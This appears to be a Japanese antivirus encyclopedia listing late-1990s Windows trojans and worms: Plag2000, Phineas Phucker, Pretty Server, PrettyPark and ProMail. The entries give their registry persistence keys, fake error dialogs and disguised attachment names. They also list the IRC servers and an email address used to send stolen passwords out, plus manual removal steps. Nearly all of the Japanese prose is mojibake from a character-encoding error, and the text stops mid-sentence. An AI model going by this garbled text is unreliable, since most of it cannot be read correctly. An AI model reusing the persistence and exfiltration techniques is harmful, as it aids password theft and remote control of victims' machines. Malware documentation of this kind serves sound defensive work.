ÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£E¡ÝMAIL¤òÍøÍѤ·¤Æ¼«¿È¤Î¥Õ¥¡¥¤ ¥ë¤òÁ÷¿®¤·³È»¶¤¹¤ë¹Ôư¤ò¹Ô¤¤¤Þ¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤Ø¤Î´¶ À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£°ì¸Ä¤Î¥×¥í¥°¥é¥à¤Ê¤Î¤Ç¶î½ü¤Ï¤Ç¤­ ¤Þ¤»¤ó¡£È¯¸«¤µ¤ì¤¿¾ì¹ç¤Ï¥Õ¥¡¥¤¥ë¤´¤Èºï½ü¤·¤Æ¤¯¤À¤µ ¤¤¡£ ¡¡¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϵ¯Æ°¤µ¤ì¤ë¤ÈWinzip¤Î¼«¸Ê²òÅà¥Õ¥¡ ¥¤¥ë¤òÁõ¤Ã¤¿¥À¥¤¥¢¥í¥°¥Ü¥Ã¥¯¥¹¤òɽ¼¨¤·¤Þ¤¹¡£¥æ¡¼¥¶ ¡¼¤¬¤É¤Î¥Ü¥¿¥ó¤ò¥¯¥ê¥Ã¥¯¤·¤Æ¤â΢¤Ç¼«¿È¤Î¥³¥Ô¡¼¤ò" INETD.EXE"¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾¤ÇWindows¥Ç¥£¥ì¥¯¥È¥ê¤ËºîÀ® ¤·¡¢¥·¥¹¥Æ¥à¤ò²þÊѤ·¤Æ¥·¥¹¥Æ¥àµ¯Æ°»þ¤Ë¼«Æ°µ¯Æ°¤µ¤ì¤ë ¤è¤¦ÀßÄꤷ¤Þ¤¹¡£¼¡¤Ë¤½¤Î¥·¥¹¥Æ¥à¾å¤ÇÀßÄꤵ¤ì¤Æ¤¤¤ë¥á ¡¼¥ë¥Ü¥Ã¥¯¥¹¤Î¼õ¿®¥È¥ì¥¤(Inbox)¤Ë¤¢¤ë̤ÆÉ¥á¡¼¥ë¤ËÂФ· ¤Æ¥ï¡¼¥à¤Î¥Õ¥¡¥¤¥ë¤òźÉÕ¤·¤ÆÊÖ¿®¤ò¹Ô¤¤¤Þ¤¹¡£
¡¡¤³¤Î¥ï¡¼¥à¤¬½Ð¤¹¥á¡¼¥ë¤ÎËÜʸ¤Ï°Ê²¼¤ÎÄ̤ê¤Ç¤¹:

¡¡"¥á¡¼¥ë¤Î»ÈÍѼÔ̾" wrote:
¡¡==== ¡¡- ¡¡- ¡¡- ¡¡====
¡¡P2000 Mail auto-reply:
¡¡"I will try to reply as soon as possible. ¡¡Take a look to the attachment and send me your opinion!" ¡¡> Get your FREE P2000 Mail now! < ¡¡¤Þ¤¿¡¢ÅºÉÕ¥Õ¥¡¥¤¥ë¤È¤·¤Æ»ÈÍѤµ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤ÏȽÌÀ
¤·¤Æ¤¤¤ë¤À¤±¤Ç¤â°Ê²¼¤Î¤â¤Î¤¬¤¢¤ê¤Þ¤¹:
pics.exe, images.exe, joke.exe, PsPGame.exe, news_ doc.exe, hamster.exe, tamagotxi.exe, searchURL.exe, SETUP.EXE, Card.EXE, billgt.exe, midsong.exe, s3msong.exe, docs.exe, humor.exe, fun.exe. ¡¡¾åµ­°Ê³°¤Î¥Õ¥¡¥¤¥ë̾¤¬»È¤ï¤ì¤ë²ÄǽÀ­¤â¤¢¤ë¤Î¤ÇÃí°Õ ¤¬É¬ÍפǤ¹¡£ ¡¦¥ï¡¼¥à¤Ï¼«¿È¤Î¼«Æ°µ¯Æ°¤ÎÀßÄê¤È¤·¤Æ°Ê²¼¤Î¥·¥¹¥Æ¥à²þ ÊѤò¹Ô¤¤¤Þ¤¹
Windows 95/98 ¤Î¾ì¹ç:
¡¡Win.iniÆâ¤Ë"run={Windows¤Î¥Ç¥£¥ì¥¯¥È¥ê}\INETD.EXE" ¤È¤¤¤¦µ­½Ò¤òÄɲä·¤Þ¤¹¡£
¡ô{Windows¤Î¥Ç¥£¥ì¥¯¥È¥ê}¤ÏÄ̾ï¤Ï"C:\Windows"¤Ç¤¹¡£

Windows NT ¤Î¾ì¹ç:
¡¡¥ì¥¸¥¹¥È¥êÆâ¤Î"HKEY_CURRENT_USER\Software\Microsoft \WindowsNT\CurrentVersion\Windows\RUN"¤Ë"{Windows¤Î ¥Ç¥£¥ì¥¯¥È¥ê}\INETD.EXE"¤òÀßÄꤷ¤Þ¤¹
¡ô{Windows¤Î¥Ç¥£¥ì¥¯¥È¥ê}¤ÏÄ̾ï¤Ï"C:\WinNT"¤Ç¤¹¡£
¡¦¥Õ¥¡¥¤¥ëµ¯Æ°»þ¤Ëɽ¼¨¤¹¤ëWinzip¼«¸Ê²òÅà¥Õ¥¡¥¤¥ë¤Î¥á ¥Ã¥»¡¼¥¸¤Ç¥æ¡¼¥¶¡¼¤¬ "Unzip" ¤â¤·¤¯¤Ï "Run Winzip" ¤Î ¥Ü¥¿¥ó¤ò¥¯¥ê¥Ã¥¯¤¹¤ë¤È°Ê²¼¤Î¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤òɽ¼¨ ¤·¡¢¥æ¡¼¥¶¡¼¤ÎÌܤòµ½¤­¤Þ¤¹¡£
¡¡"ZIP damaged: file C:\NIX\PLAG2000.EXE: Bad CRC
number.
¡¡Possible cause: file transfer error."
¡¡¤½¤ì°Ê³°¤Î¥Ü¥¿¥ó¤ò²¡¤·¤¿¾ì¹ç¤Ï°Ê²¼¤Î¤è¤¦¤ÊWindows¤Î ÉÔÀµ½èÍý¥¨¥é¡¼¤òÌϤ·¤¿¥á¥Ã¥»¡¼¥¸¥Ü¥Ã¥¯¥¹¤òɽ¼¨¤µ¤»¡¢ ¥æ¡¼¥¶¡¼¤ÎÌܤòµ½¤­¤Þ¤¹¡£
Windows 95/98 ¤Î¾ì¹ç:

¥¿¥¤¥È¥ë: Plag2000

ËÜʸ: This program has performed an illegal
operation and will be shut down. If the problem persists, contact the program vendor.
Windows NT ¤Î¾ì¹ç:

¥¿¥¤¥È¥ë:Dr. Watson for Windows NT

ËÜʸ: An application error has occured and
an application error log is being generated.
Plag2000.exe Exception: access violation (

0xc0000005), Address: 0x00410074

È÷¡¡¡¡¹Í:¼êưºï½ü¼ê½ç:
¡¡¥ï¡¼¥à¤Î¥Õ¥¡¥¤¥ë¤òµ¯Æ°¤·¤Æ¤·¤Þ¤¤¥·¥¹¥Æ¥à¤¬²þÊѤµ¤ì ¤Æ¤·¤Þ¤Ã¤¿¾ì¹ç¤Ï°Ê²¼¤ÎÊýË¡¤Ç¥·¥¹¥Æ¥à¤ò½¤Éü¤·¤Æ¤¯¤À¤µ ¤¤¡£
Windows 95/98 ¤Î¾ì¹ç:
Win.iniÆâ¤Î"RUN="¤Î¹Ô¤«¤é"{Windows¤Î¥Ç¥£¥ì¥¯ ¥È¥ê}\INETD.EXE"¤òºï½ü ¥Þ¥·¥ó¤òºÆµ¯Æ° Windows¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î"INETD.EXE"¥Õ¥¡¥¤¥ë¤òºï½ü ¡¡
Windows NT ¤Î¾ì¹ç:
CTRL-ALT-DEL¤Ç¥¿¥¹¥¯¥Þ¥Í¡¼¥¸¥ã¡¼¤òµ¯Æ°¤·¡¢ INETD.EXE¤Î¥×¥í¥»¥¹¤ò½ªÎ» ¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òµ¯Æ°¤·¡¢"HKEY_CURRENT_USER\ Software\Microsoft\WindowsNT\CurrentVersion\Windows\ RUN"¤«¤é"{Windows¤Î¥Ç¥£¥ì¥¯¥È¥ê}\INETD.EXE"¤ÎÀßÄê¤òºï ½ü Windows¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î"INETD.EXE"¥Õ¥¡¥¤¥ë¤òºï½ü ¡¡ °Ê¾å

TROJ_PPHUCKER.C


̾¡¡¡¡¾Î:TROJ_PPHUCKER.C

ÊÌ¡¡¡¡Ì¾:PHINEAS PHUCKER

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:352,768 bytes¾Ü¡¡¡¡ºÙ:- ¤³¤Î¥×¥í¥°¥é
¥à¤ÏÊ̼ï¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥àBack Orifice(TROJ_ BOSERVER/TROJ_BOCLIENT)¤Î¤è¤¦¤Ê¥Í¥Ã¥È¥ï¡¼¥¯¥Ï¥Ã¥­¥ó¥° ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£ - ¤³¤ì¤ÏTROJ_PPHUCKER.S¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤ò¥ê¥â¡¼¥ÈÁàºî ¤¹¤ë¤¿¤á¤Î¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡TROJ_PPHUCKER. S¤¬Æ°ºî¤·¤Æ¤¤¤ëPC¤¬¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤Ç¤­¤ë´Ä¶­¤Ë¤¢ ¤ì¤Ð¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¤½¤Î¥Þ¥·¥ó¤ò¹¥¤­¾¡¼ê¤Ë¥³¥ó ¥È¥í¡¼¥ë¤¹¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡

TROJ_PPHUCKER.S


̾¡¡¡¡¾Î:TROJ_PPHUCKER.S

ÊÌ¡¡¡¡Ì¾:Phineas Phucker

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win95 / Win98 / Win NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:93,250 bytes

ȯ¸«Æü:1998/12

¾Ü¡¡¡¡ºÙ:NetBus¥¦¥¤¥ë¥¹¤äBackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¡¢
¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤Æ¥Ï¥Ã¥­¥ó¥°¤ò¹Ô¤Ê¤¦¥µ¡¼¥Ð¡¼Ž¥¥¯¥é¥¤ ¥¢¥ó¥È·¿¥Ä¡¼¥ë¡£¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë(TROJ_PPHUCKER.S)¤È ¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë(TROJ_PPHUCKER.C)¤¬¤¢¤ëŽ¡ ¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ<¥ë¡¼¥È>\WINDOWS¥Ç¥£¥ì¥¯¥È¥ê¤Ë" ppmod1.sys ¡É¤È¤¤¤¦Ì¾Á°¤Ç¼«Ê¬¼«¿È¤ÎÊ£À½¤òºîÀ®¤¹¤ëŽ¡ ¤Þ¤¿Ž¤-¥Þ¥·¥óµ¯Æ°»þ¤ËËè²ó¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦ ¤Ë¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Øppmod1.sys ¤òÅÐÏ¿¤¹¤ë¡£¤³¤ì¤Ë¤è ¤êޤ¥Þ¥·¥ó¤òµ¯Æ°¤¹¤ëÅ٤ˎ¤ ¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤ¬¼Â¹Ô¤µ¤ì¤ë Ž¡¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤¥ë¤Îºï½ü¤Ï¤Ç¤­¤Ê¤¤Ž¡ HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/ CurrentVersion/RunServices/
¾É¾õ:¡Ý¤³¤ì¤Ïޤ¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤Ç¤¢¤ëŽ¡¥æ¡¼¥¶¡¼¤¬¤³
¤Î¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤Æ¥Þ¥·¥ó¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤¹¤ë¤È¡¢¥Ï¥Ã ¥«¡¼¤¬¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤òÍøÍѤ·¤ÆŽ¤¥ê¥â¡¼¥È¥¢¥¯¥» ¥¹¤Ë¤è¤ê¡Ö¥Õ¥¡¥¤¥ë¤Ë¥¢¥¯¥»¥¹¤¹¤ë¡×¡Ö¥Ñ¥¹¥ï¡¼¥É¤òÅð ¤à¡×¡Ö¥Þ¥·¥ó¤ò¥·¥ã¥Ã¥È¥À¥¦¥ó¤¹¤ë¡×¤È¤¤¤Ã¤¿Áàºî¤ò¾¡¼ê ¤Ë¹Ô¤¦¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ëŽ¡

TROJ_PRETTY


̾¡¡¡¡¾Î:TROJ_PRETTY

ÊÌ¡¡¡¡Ì¾:Pretty Server

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows3.1°Ê¾å

¥¦¥¤¥ë¥¹¥µ¥¤¥º:37,376¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏPE¥¿¥¤¥×¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é
¥à¤Ç¾¤Î¥Õ¥¡¥¤¥ë¤ä¥·¥¹¥Æ¥à¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ BackOrifice¥¦¥¤¥ë¥¹¤ÈƱ¤¸¤¯¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥Ï¥Ã¥­ ¥ó¥°¤ò¹Ô¤Ê¤¦¥Ä¡¼¥ë¤Ç¤¢¤ë¡£¤³¤ì¤Ï¥µ¡¼¥Ð¡¼¥¯¥é¥¤¥¢¥ó¥È ·¿¥×¥í¥°¥é¥à¤Ç¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿¥³¥ó¥Ô¥å ¡¼¥¿¤Ç¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢IP¥¢¥É¥ì¥¹¤ò Æþ¼ê¤·¤¿¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¥Ï¥Ã¥«¡¼¤¬¤½¤Î ¥³¥ó¥Ô¥å¡¼¥¿¤Ë¥¢¥¯¥»¥¹¤·¡¢±ó³ÖÀ©¸æ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤è ¤¦¤Ë¤Ê¤ë¡£ ¥æ¡¼¥¶¡¼¤Î¥³¥ó¥Ô¥å¡¼¥¿¡¼¤ËÀø¤ê¤³¤à¥µ¡¼¥Ð¡¼¡¦¥â¥¸¥å ¡¼¥ë¤È¡¢¥Ï¥Ã¥«¡¼¤¬±ó³ÖÁàºî¤ò¹Ô¤Ê¤¦¤¿¤á¤Î¥¯¥é¥ó¥¢¥ó¥È ¡¦¥â¥¸¥å¡¼¥ë¤«¤é¤Ê¤ë¡£ ¥á¥â¥ê¡¼¾å¤Ç¥¦¥¤¥ë¥¹¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥µ¡¼¥Ð¡¼¡¦¥â¥¸¥å ¡¼¥ë¤Ï¡¢WSOCK32.DLL¤Î°Ê²¼¤Îµ¡Ç½¤Ê¤É¤òÍøÍѤ¹¤ë¡£ gethostbyname socket sendto send recvfrom recv inet_ntoa inet_addr htons connect closesocket bind. ¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤Ï¤³¤ì¤é¤Îµ¡Ç½¤òÍøÍѤ·¤Æ¡¢¥Û¥¹ ¥ÈŽ¥¥³¥ó¥Ô¥å¡¼¥¿¤òÁàºî¤¹¤ë¡£
È÷¡¡¡¡¹Í:¥ì¥¸¥¹¥È¥ê¤Î·ë¹ç¤ò¤Ï¤º¤¹¤Þ¤¨¤ËFILES32.VXD¤ò
ºï½ü¤¹¤ë¤È¡¢Windows¤Ï¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤òµ¯Æ°¤Ç¤­¤Ê¤¯¤Ê ¤ë¡£¤³¤ì¤Ï¡¢¥¦¥¤¥ë¥¹¤¬SHELL32.DLL¤Î´Ø¿ôShellExecuteA ¤ò¸Æ¤Ó½Ð¤·¤Æ¡¢°Ê²¼¤ÎÀßÄê¤ò¹Ô¤Ê¤¦¤¿¤á¤Ç¤¢¤ë¡£ HKEY_CLASSES_ROOT\exefile\shell\open\command ="\"%1\ " %*" HKEY_CLASSES_ROOT\exefile\shell\open\command =" FILES32.VXD \"%1\" %*" ¤³¤ì¤Ë¤è¤ê¡¢¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤òFILES32.VXD¤Î¥Ñ¥é¥á¡¼¥¿ ¡¼¤È¤·¡¢¾ï¤Ë¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤ËÀè¶î¤±¤ÆFILES32.VXD¤¬Î© ¤Á¾å¤¬¤ë¤è¤¦¤ËÀßÄꤵ¤ì¤ë¡£

TROJ_PRETTY_PARK


̾¡¡¡¡¾Î:TROJ_PRETTY_PARK

ÊÌ¡¡¡¡Ì¾:PE_PRETTYPARK, PRETTYPARK.WORM, TROJ_PSW.
CHV, TROJAN HORSE, W32.PRETTYPARK
ÂС¡¡¡¾Ý:WINDOWS95/98,NT

ȯ¾ÍÃÏ:¥è¡¼¥í¥Ã¥Ñ

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥¦¥¤¥ë¥¹¤Ç¤Ï¤Ê¤¯¥ï¡¼¥à¤ËʬÎव¤ì¤ëÇË
²õ¥×¥í¥°¥é¥à¤Ç¤¹Ž¡¥Í¥Ã¥È¥ï¡¼¥¯¤äE-MailޤNewsGroup¤òÄ̤¸ ¤ÆÂ¾¤Î¥Þ¥·¥ó¤ËÁý¿£¤ò¹­¤²¤Æ¤¤¤¯¥¿¥¤¥×¤Ç¤¢¤êޤ¥í¡¼¥«¥ë¥Þ ¥·¥óÆâ¤Ç¾¤Î¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤¢¤ê¤Þ¤»¤óŽ¡ - ¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤Èޤ\Windows\System ¥Ç¥£¥ì ¥¯¥È¥ê¤ËŽ¢FILES32.VxDŽ£¤È¤¤¤¦Ì¾Á°¤Ç¼«Ê¬¼«¿È¤ÎÊ£À½¤òºîÀ® ¤·¤Þ¤¹Ž¡ -¡¡¼¡¤Ëޤ²¼µ­¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤ÎÃͤò "%1" %* ¤«¤é FILES32.VXD "%1" %* ¤ËÊѹ¹¤·¤Þ¤¹¡£¤³¤ÎÁàºî¤Ë¤è¤Ã¤ÆŽ¤Â¾ ¤Î¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤¬¼Â¹Ô¤µ¤ì¤ë¤È¤­¤Ëޤɬ¤º¥×¥í¥°¥é¥à¤¬ ¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤵ¤ì¤Þ¤¹Ž¡ ¡¦HKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\ open\command ¤Þ¤¿¤Ïޤ ¡¦HKEY_CLASSES_ROOT\exefile\shell\open\command ¤³¤ÎޤFILES32.VxD¤ÏޤWINDOWS95/98¤ÎVxD¥É¥é¥¤¥Ð¡¼¤Ç¤Ï¤Ê ¤¯Ž¤¼ÂºÝ¤ÏPE(Windows 32Bit¼Â¹Ô·¿)¥Õ¥¡¥¤¥ë¤Ç¤¹Ž¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤Èޤ¼«Ê¬¼«¿È¤òźÉÕ¤·¤¿¥á ¡¼¥ë¤ò¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È¥¢¥É¥ì¥¹Ä¢¤ËÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¥¢¥É ¥ì¥¹¤Ë¾¡¼ê¤ËÁ÷¿®¤·¤è¤¦¤È¤·¤Þ¤¹Ž¡ -¡¡¤Þ¤¿Ž¤¤³¤Î¥ï¡¼¥à¤Îºî¼Ô¤ËŽ¢¥æ¡¼¥¶¡¼¤¬Áàºî¤ò¼õ¤±¤é¤ì¤ë ¾õÂ֤Ǥ¢¤ëŽ£¤È¤¤¤¦¤³¤È¤òÃΤ餻¤ë¤¿¤á¤Ëޤ°Ê²¼¤ÎIRC¥Á¥ã¥ó ¥Í¥ë¤ËÀܳ¤ò»î¤ßޤ¥×¥í¥°¥é¥à¤Îºî¼Ô¤Ë¥·¥¹¥Æ¥à¾ðÊó¤È¥Ñ¥¹ ¥ï¡¼¥É¤òÁ÷¿®¤·¤Þ¤¹Ž¡ irc.twiny.net irc.stealth.net irc.grolier.net irc.club-internet.fr ircnet.irc.aol.com irc.emn.fr irc.anet.com irc.insat.com irc.ncal.verio.net irc.cifnet.com irc.skybel.net irc.eurecom.fr irc.easynet.co.uk -¡¡¹¹¤Ëޤ¤³¤Î¥×¥í¥°¥é¥à¤ÏTROJ_BKDOOR¤Î¥µ¡¼¥Ð¡¼¥×¥í¥°¥é ¥à¤È¤·¤Æµ¡Ç½¤·¤Þ¤¹Ž¡¥¦¥¤¥ë¥¹¤ÎºîÀ®¼Ô¤Ïޤ¤³¤Î¥×¥í¥°¥é¥à ¤òÄ̤¸¤ÆŽ¤¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥ó¤«¤éޤ¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤¹ ¤ë¤¿¤á¤Î¥À¥¤¥¢¥ë¥¢¥Ã¥×Àè¤ÎÅÅÏÃÈֹ掤¥í¥°¥¤¥óÌ¾Ž¤¥Ñ¥¹¥ï ¡¼¥ÉޤICQÅÐÏ¿Èֹ掤¥·¥¹¥Æ¥à¤Î¥É¥é¥¤¥Ö¤È¥Ç¥£¥ì¥¯¥È¥ê¾ðÊó ¤ò¼èÆÀ¤¹¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ê¤Þ¤¹Ž¡¤Þ¤¿Ž¤¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥ó ¤Î¥Õ¥¡¥¤¥ë¤ä¥Ç¥£¥ì¥¯¥È¥ê¤ò¾¡¼ê¤ËºîÀ®/ºï½ü¤·¤¿¤êޤ¥×¥í ¥°¥é¥à¤ò¼Â¹Ô¤·¤¿¤ê¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹Ž¡
È÷¡¡¡¡¹Í:**¼êưºï½ü¼ê½ç**¡Ê¥¦¥¤¥ë¥¹¤Ç¤Ï¤Ê¤¤¤Î¤Ç¶î½ü
¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤¡Ë ­¡Windows¥á¥Ë¥å¡¼¤«¤éŽ¢¥Õ¥¡¥¤¥ë̾¤ò»ØÄꤷ¤Æ¼Â¹ÔŽ£¤òÁª¤Ó ޤregedit¤ÈÆþÎϤ·¤ÆŽ¤¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òɽ¼¨¤¹¤ëŽ¡ ­¢Ž¢ÊÔ½¸Ž£¥á¥Ë¥å¡¼¤ÎŽ¢¸¡º÷Ž£¤ÇޤޢFiles32.vxdŽ£¤ò¸¡º÷¤·Ž¤°Ê²¼ ¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤òõ¤¹Ž¡(²¼µ­2¤Ä°Ê³°¤Î¤È¤³¤í¤«¤é¸« ¤Ä¤«¤Ã¤¿¾ì¹ç¤Ï̵»ë¤·¤Æ¤â¤è¤¤Ž¡ ) ¡¦HKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\ open\command ¤Þ¤¿¤Ïޤ ¡¦HKEY_CLASSES_ROOT\exefile\shell\open\command ­£¸«¤Ä¤«¤Ã¤¿¥¨¥ó¥È¥ê¤ÎŽ¢Ì¾Á°Ž£¤Î¤È¤³¤í¤ÏŽ¢(ɸ½à)Ž£¤Ë¤Ê¤Ã ¤Æ¤¤¤ë¤Ï¤º¤Ç¤¢¤ëŽ¡¤³¤ì¤ò¥À¥Ö¥ë¥¯¥ê¥Ã¥¯¤·¤ÆÊÔ½¸¥á¥Ë¥å ¡¼¤òɽ¼¨¤¹¤ëŽ¡ ­¤Ž¢FILES32.VXD "%1" %*Ž£¤È¤¤¤¦ÃͤΥǡ¼¥¿¤òޤޢ"%1" %*Ž£¤Ë Êѹ¹¤·Ž¤OK¤ò²¡¤¹Ž¡ ­¥¥Þ¥·¥ó¤òºÆµ¯Æ°¤·Ž¤\Windows\System ¥Ç¥£¥ì¥¯¥È¥ê¤ÎŽ¢ FILES32.VxDŽ£¤òºï½ü¤¹¤ëŽ¡ ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢ ¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥·¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬ ¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_PROMAIL.121


̾¡¡¡¡¾Î:TROJ_PROMAIL.121

ÊÌ¡¡¡¡Ì¾:PROMAILޤ TROJ.PWS.PROMAILޤ PWS.PROMAIL

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:583ޤ168bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1999/03

¾Ü¡¡¡¡ºÙ:-¡¡TROJ_PROMAIL.121 ¤Î¥ª¥ê¥¸¥Ê¥ë¥×¥í¥°¥é¥à
(ProMail.exe)¤ÏޤProMail1.21¤È¸Æ¤Ð¤ì¤ë¥Õ¥ê¡¼¥½¥Õ¥È¥¦¥§ ¥¢¤Ç¤¢¤ëŽ¡¤³¤ì¤ÏÊ£¿ô¤Î ¥á¡¼¥ë¥¢¥«¥¦¥ó¥È¤òÀÚ¤êÂØ¤¨¤Æ»ÈÍѤ¹¤ë»ö¤¬¤Ç¤­¤ë¥á¡¼¥ë ¥½¥Õ¥È¥¦¥§¥¢¤À¤È¤·¤Æ¸ø³«¤µ¤ì¤¿¤¬Ž¤¼ÂºÝ¤Ë¤Ï¥á¡¼¥ë¥¢¥«¥¦ ¥ó¥È¤Î¥Ñ¥¹¥ï¡¼¥É¤òÅð¤à¤³¤È¤òÌÜŪ¤Ëºî¤é¤ì¤¿¥È¥í¥¤¤ÎÌÚ ÇÏ ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ëŽ¡ -¡¡PROMAIL1.21¤Ïޤ¥æ¡¼¥¶¡¼¤¬»ý¤Ã¤Æ¤¤¤ë¥á¡¼¥ë¥¢¥É¥ì¥¹°ì ¤Ä°ì¤Ä¤ËÂФ·¤ÆProMailÍѤΥ᡼¥ë¥¢¥«¥¦¥ó¥È¤òºîÀ®¤¹¤ëŽ¡ ¥æ¡¼¥¶¡¼¤¬¼Â¹Ô¤¹¤ë¤Èޤ¤Þ¤º°Ê²¼¤Î¾ð Êó¤òÆþÎϤ·¤Ê¤±¤ì¤Ð¤Ê¤é¤Ê¤¤Ž¡ User¡Çs e-mail address Real Name Organization Reply- to e-mail address Reply-to real name -¡¡¼¡¤Ë¥á¡¼¥ë¥µ¡¼¥Ð¡¼¤È¤½¤Î¥¢¥«¥¦¥ó¥È¾ðÊó¤òÆþÎϤ¹¤ë¤è ¤¦¤ËÍ׵ᤵ¤ì¤ëŽ¡ POP3 user name POP3 password POP3 server name
POP3 port (default: 110) .
SMTP server name
SMTP port (default: 25) .
-¡¡¥¢¥«¥¦¥ó¥È¾ðÊó¤ÏޤProMail¤Î¥¤¥ó¥¹¥È¡¼¥ë¥Õ¥©¥ë¥À¤Ë¤½ ¤ì¤¾¤ì¤Î¥á¡¼¥ë¥¢¥«¥¦¥ó¥È¤´¤È¤ËºîÀ®¤µ¤ì¤ëACCOUNT.INI¥Õ ¥¡¥¤¥ë¤Ë½ñ¤­¹þ¤Þ¤ì¤ëŽ¡¥Ñ¥¹¥ï¡¼¥É¤Ï °Å¹æ²½¤µ¤ì¤ÆÊݸ¤µ¤ì¤ëŽ¡ -¡¡¤½¤Î¸åޤ¥æ¡¼¥¶¡¼¤¬ProMail¤ò»ÈÍѤ·¤ÆŽ¤½é¤á¤Æ¥á¡¼¥ë¤ò ¼õ¿®¤·¤è¤¦¤·¤¿¤È¤­Ž¤¤½¤ì¤¾¤ì¤ÎACCOUNT.INI¥Õ¥¡¥¤¥ë¤ÎÆâ ÍÆ¤¬Ž¤ naggamanteh@usa.net¤È¤¤¤¦¥á¡¼¥ë¥¢¥É¥ì¥¹¤ËÂФ·¤ÆÁ÷¿®¤µ 